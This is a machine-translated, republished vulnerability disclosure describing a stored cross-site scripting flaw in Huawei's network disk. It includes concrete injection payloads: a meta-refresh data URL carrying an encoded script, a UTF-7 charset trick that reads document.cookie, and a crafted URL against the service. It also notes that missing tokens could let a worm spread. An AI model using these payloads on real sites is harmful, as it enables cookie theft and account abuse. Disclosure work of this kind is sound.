Huawei network disk storage type xss

Source: Internet
Author: User

Huawei network disk storage type xss

RT. Thk @/fd.

Detailed description:

Buy glory 6. Test it ..

Upload a file. Release External links. Modify external link name

The entity encoding can generate an output point.

Code Region
<Meta name = "keywords" content = "", output point, network disk, Huawei network disk, DBank network disk, free network disk, network hard disk, Network Disk download, network storage space, cloud storage "/>



Two exploitation methods,

First, http-equiv = "Refresh"

Insert Code

Code Region
0,url=data&#58;text&#47;html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&#34;http-equiv=&#34;Refresh&#34;.txt







Because it is data. The cookie cannot be passed. However, we found that most of Huawei's operations do not have token, so we can use Cross-Origin Resource Sharing (cors) post data to cause worms and other impacts.



Second. Ie only

Use Code

Code Region
"charset=utf-7 +AD4APA-script+AD4-alert(document.cookie)+ADw-/script+AD4-



Ie or qq browser (ie kernel browser)

Http://dl.vmall.com/c0iem6xdrx? V= 149900454 & % 3 Cmeta % 20http-equiv % 3D



In this way, data such as cookies can be transmitted. The disadvantage is browser restrictions and similar reflective xss.

The principle is that the get data includes <meta http-equiv> and the original charset is called using xss filter.

Proof of vulnerability:

As mentioned above

Solution:

Filter more ~~

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.